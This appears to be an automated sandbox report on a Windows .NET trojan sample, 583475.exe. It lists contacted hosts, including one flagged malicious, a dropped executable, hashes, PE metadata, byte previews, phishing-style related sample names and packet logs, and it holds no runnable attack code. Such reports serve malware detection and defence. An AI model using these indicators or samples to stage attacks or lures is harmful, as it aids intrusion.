                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.google.com583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmpfalse
                          high
                          http://ns.adobe.c/gE583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://ns.adobe.cobj583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://ns.adobe.cobjE583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://ns.ado/1E583475.exe, 00000000.00000003.659153791.0000000006D81000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://ns.d583475.exe, 00000000.00000003.658913034.0000000006D81000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://ns.adobe.c/g583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name583475.exe, 00000000.00000002.741286003.0000000002C41000.00000004.00000001.sdmpfalse
                            high
                            http://ns.ado/1583475.exe, 00000000.00000002.747848189.0000000006D7F000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            142.250.185.228
                            www.google.comUnited States
                            15169GOOGLEUSfalse
                            34.102.136.180
                            tinyhollywood.comUnited States
                            15169GOOGLEUSfalse
                            68.66.224.28
                            appsdeals14.comUnited States
                            55293A2HOSTINGUStrue

                            General Information

                            Joe Sandbox Version:33.0.0 White Diamond
                            Analysis ID:510246
                            Start date:27.10.2021
                            Start time:16:28:10
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 11m 0s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:583475.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:20
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:1
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@10/2@4/3
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 21.4% (good quality ratio 19.2%)
                            • Quality average: 71.4%
                            • Quality standard deviation: 32%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 119
                            • Number of non-executed functions: 158
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 23.211.6.115, 131.253.33.200, 13.107.22.200, 20.82.209.183, 20.54.110.249, 40.112.88.60, 40.91.112.76, 80.67.82.211, 80.67.82.235, 20.50.102.62
                            • Excluded domains from analysis (whitelisted): www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            16:29:05API Interceptor212x Sleep call for process: 583475.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            68.66.224.28http://nestjs-doc.exceptionfound.com/interfaces/classtransformoptions.htmlGet hashmaliciousBrowse
                            • nestjs-doc.exceptionfound.com/interfaces/classtransformoptions.html

                            Domains

                            No context

                            ASN

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            A2HOSTINGUSSecuriteInfo.com.Trojan.GenericKD.47258968.7621.exeGet hashmaliciousBrowse
                            • 185.146.22.233
                            PO_W4420211025#BULGARIA SAINT GOBAIN.exeGet hashmaliciousBrowse
                            • 185.146.22.233
                            PO_W4420211025#BULGARIA SAINT GOBAIN.exeGet hashmaliciousBrowse
                            • 185.146.22.233
                            Factura FAN CourierFAN Courier Invoice 7038848_pdf.exeGet hashmaliciousBrowse
                            • 185.146.22.233
                            Scan_Documentsfile00384740599HFH4.exeGet hashmaliciousBrowse
                            • 85.187.132.177
                            HTK TT600202109300860048866 Payment Proof.pdf.exeGet hashmaliciousBrowse
                            • 185.146.22.238
                            SDL_Order Onay#U0131 _ Acil,pdf.exeGet hashmaliciousBrowse
                            • 70.32.23.53
                            Progetto Plastisavio S.p.A. 19_10_2021_pdf.exeGet hashmaliciousBrowse
                            • 185.146.22.233
                            jew.x86Get hashmaliciousBrowse
                            • 68.66.210.7
                            Schenker Italiana S.p.A. CW305.exeGet hashmaliciousBrowse
                            • 185.146.22.233
                            PyZcDaysXOGet hashmaliciousBrowse
                            • 185.148.131.2
                            Orden de compra n_ 393116209.exeGet hashmaliciousBrowse
                            • 185.146.22.233
                            Update-KB250-x86.exeGet hashmaliciousBrowse
                            • 85.187.148.2
                            Update-KB2984-x86.exeGet hashmaliciousBrowse
                            • 85.187.148.2
                            test2.dllGet hashmaliciousBrowse
                            • 185.146.22.232
                            doc.msg.exeGet hashmaliciousBrowse
                            • 85.187.148.2
                            Confirm_Sept_Invoice.htmlGet hashmaliciousBrowse
                            • 68.66.226.75
                            New_AMT_Policy.htmlGet hashmaliciousBrowse
                            • 68.66.226.75
                            New_AMT_Policy.htmlGet hashmaliciousBrowse
                            • 68.66.226.75
                            DOCUMENT TRK.docGet hashmaliciousBrowse
                            • 85.187.128.246

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            54328bd36c14bd82ddaa0c04b25ed9adTEaKKn2Dkf.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            Km5KAxQLLV.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            P.O_45030090VT_Glaserei_Gueney.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            mJ1frOovsp.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            PRODUCT ENQUIRY #20211027.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            IB5eMmKwbD.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            Duty invoice & clearance document.vbsGet hashmaliciousBrowse
                            • 142.250.185.228
                            Shipment #45523666245.vbsGet hashmaliciousBrowse
                            • 142.250.185.228
                            PO No-512 3111.vbsGet hashmaliciousBrowse
                            • 142.250.185.228
                            IDSTATEMENTS.vbsGet hashmaliciousBrowse
                            • 142.250.185.228
                            avocFyG.vbsGet hashmaliciousBrowse
                            • 142.250.185.228
                            r18qGHf6vL.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            DHL_document11022020680908911.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            Goldschmidt_P.O_342044090VT.vbsGet hashmaliciousBrowse
                            • 142.250.185.228
                            36#U0443.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            ssjZo49L9R.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            S011814021275597.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            f25d7dae55dc8c848e9fed3f218f886f4ca4412e5b94a.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            8cc8f28391efb0099a231da1df27d6acc2a9dbfdc11d5.exeGet hashmaliciousBrowse
                            • 142.250.185.228
                            xmzY7ZAuZp.exeGet hashmaliciousBrowse
                            • 142.250.185.228

                            Dropped Files

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            C:\Users\user\AppData\Local\Temp\AddInProcess32.exeNewOrderPDF.exeGet hashmaliciousBrowse
                              DHLExpress_Shipment101909.exeGet hashmaliciousBrowse
                                Niki-Gmbh Germany Inquiry.exeGet hashmaliciousBrowse
                                  Enquiry MW886079 ( Flowstar.CO.UK ).exeGet hashmaliciousBrowse
                                    Order18102021.exeGet hashmaliciousBrowse
                                      DHL_Ship_152021.exeGet hashmaliciousBrowse
                                        DO854.exeGet hashmaliciousBrowse
                                          DrAlj265av.exeGet hashmaliciousBrowse
                                            masa_prot.exeGet hashmaliciousBrowse
                                              75lT7DuXrs.exeGet hashmaliciousBrowse
                                                dark.exeGet hashmaliciousBrowse
                                                  tortilla.exeGet hashmaliciousBrowse
                                                    dark.exeGet hashmaliciousBrowse
                                                      2xYyRwsd4z.exeGet hashmaliciousBrowse
                                                        bNaLNMv3po.exeGet hashmaliciousBrowse
                                                          uUdLeF2vh0.exeGet hashmaliciousBrowse
                                                            DHL_Express1102021.exeGet hashmaliciousBrowse
                                                              VsRff7UbXL.exeGet hashmaliciousBrowse
                                                                DHL_Shipment_20210621.exeGet hashmaliciousBrowse
                                                                  SH_07391564.exeGet hashmaliciousBrowse

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\583475.exe.log
                                                                    Process:C:\Users\user\Desktop\583475.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1402
                                                                    Entropy (8bit):5.338819835253785
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4x84bE4K5AE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKoesXE8:MIHK5HKXE1qHxvbHK5AHKzvRYHKhQnoe
                                                                    MD5:1B32E71ED0326337C6593D13A55E54F4
                                                                    SHA1:0452CD9E26B6C35A3D186FD6DDB1B3365AFDB16C
                                                                    SHA-256:047E61E1F57F4922CA346203710E828859BB61800D9A72C2E64092EBB218CCA8
                                                                    SHA-512:1B5BF6D43F14FFEC6A58366222F606CB9EA1781E9E4A7E6F340E9982DD82F296ACA693EA94105F78705C01D254A7B7897050C7289CC942122C7B83221CC15DAA
                                                                    Malicious:true
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Co
                                                                    C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                    Process:C:\Users\user\Desktop\583475.exe
                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):42080
                                                                    Entropy (8bit):6.2125074198825105
                                                                    Encrypted:false
                                                                    SSDEEP:384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
                                                                    MD5:F2A47587431C466535F3C3D3427724BE
                                                                    SHA1:90DF719241CE04828F0DD4D31D683F84790515FF
                                                                    SHA-256:23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
                                                                    SHA-512:E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: NewOrderPDF.exe, Detection: malicious, Browse
                                                                    • Filename: DHLExpress_Shipment101909.exe, Detection: malicious, Browse
                                                                    • Filename: Niki-Gmbh Germany Inquiry.exe, Detection: malicious, Browse
                                                                    • Filename: Enquiry MW886079 ( Flowstar.CO.UK ).exe, Detection: malicious, Browse
                                                                    • Filename: Order18102021.exe, Detection: malicious, Browse
                                                                    • Filename: DHL_Ship_152021.exe, Detection: malicious, Browse
                                                                    • Filename: DO854.exe, Detection: malicious, Browse
                                                                    • Filename: DrAlj265av.exe, Detection: malicious, Browse
                                                                    • Filename: masa_prot.exe, Detection: malicious, Browse
                                                                    • Filename: 75lT7DuXrs.exe, Detection: malicious, Browse
                                                                    • Filename: dark.exe, Detection: malicious, Browse
                                                                    • Filename: tortilla.exe, Detection: malicious, Browse
                                                                    • Filename: dark.exe, Detection: malicious, Browse
                                                                    • Filename: 2xYyRwsd4z.exe, Detection: malicious, Browse
                                                                    • Filename: bNaLNMv3po.exe, Detection: malicious, Browse
                                                                    • Filename: uUdLeF2vh0.exe, Detection: malicious, Browse
                                                                    • Filename: DHL_Express1102021.exe, Detection: malicious, Browse
                                                                    • Filename: VsRff7UbXL.exe, Detection: malicious, Browse
                                                                    • Filename: DHL_Shipment_20210621.exe, Detection: malicious, Browse
                                                                    • Filename: SH_07391564.exe, Detection: malicious, Browse
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..X...........w... ........@.. ...................................`.................................Hw..O....... ............f..`>...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................|w......H........#...Q...................u.......................................0..K........-..*..i....*...r...p.o....,....r...p.o....-..*.....o......o.....$...*.....o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o*....(+...o,.....&...(-....*.......3..@......R...s.....s....(....*:.(/.....}P...*J.{P....o0..

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):6.317958673363568
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    File name:583475.exe
                                                                    File size:1085952
                                                                    MD5:721356bfa1f8c23d40f6b2ff77b55db0
                                                                    SHA1:c4d25b17c64716f2e7558bd302cd901bd63757d8
                                                                    SHA256:e876c1db90717ff0819f4fc578adace61decdad64963836ebc9ae983dc87a5d6
                                                                    SHA512:a424419a3083ddf2e29eea8a058a3002bc0d1cd3cbb20b6db698c90f715aa1ea1d55bc3933aaa5b7bf17d04ecd80227b1acdb7cff02c4d1177f6909766dfb8c1
                                                                    SSDEEP:12288:SscL0U9tCbBOsVTy701/hSGbBSFEuCXrmKsr3S5NTA7CJzmZjeRaoNv3/etzWl/L:SoitzsJenEuaSC5dAMqZjeRah0/eSU
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......(............................N.... ........@.. ....................................`................................

                                                                    File Icon

                                                                    Icon Hash:00828e8e8686b000

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x50a74e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                    Time Stamp:0x2817048D [Thu Apr 25 16:32:13 1991 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:v4.0.30319
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x10a6f40x57.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x10c0000x5c6.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x10e0000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000x1087540x108800False0.532818222767data6.32256294989IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x10c0000x5c60x600False0.418619791667data4.12085319226IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x10e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_VERSION0x10c0a00x33cdata
                                                                    RT_MANIFEST0x10c3dc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Version Infos

                                                                    DescriptionData
                                                                    Translation0x0000 0x04b0
                                                                    LegalCopyrightCopyright 2018
                                                                    Assembly Version1.0.0.0
                                                                    InternalNameDemoProject2.exe
                                                                    FileVersion1.0.0.0
                                                                    CompanyName
                                                                    LegalTrademarks
                                                                    Comments
                                                                    ProductNameDemoProject2
                                                                    ProductVersion1.0.0.0
                                                                    FileDescriptionDemoProject2
                                                                    OriginalFilenameDemoProject2.exe

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    10/27/21-16:30:57.115149TCP1201ATTACK-RESPONSES 403 Forbidden804983434.102.136.180192.168.2.4

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 27, 2021 16:29:02.140865088 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.140914917 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.141000032 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.183121920 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.183150053 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.235753059 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.235908031 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.240669966 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.240684986 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.240995884 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.284768105 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.631853104 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.676862001 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.702317953 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.702384949 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.702425957 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.702445030 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.702470064 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.702507973 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.702522993 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.702536106 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.702584982 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.703332901 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.704622984 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.704665899 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.704693079 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.704705954 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.704761028 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.705944061 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.707242012 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.707284927 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.707320929 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.707340956 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.707403898 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.721030951 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.721581936 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.721647024 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.721647024 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.721663952 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.721718073 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.723046064 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.724215031 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.724261999 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.724272966 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.724293947 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.724348068 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.725517035 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.726818085 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.726862907 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.726869106 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.726881981 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.726922035 CEST49757443192.168.2.4142.250.185.228
                                                                    Oct 27, 2021 16:29:02.728116989 CEST44349757142.250.185.228192.168.2.4
                                                                    Oct 27, 2021 16:29:02.729406118 CEST44349757142.250.185.228192.168.2.4
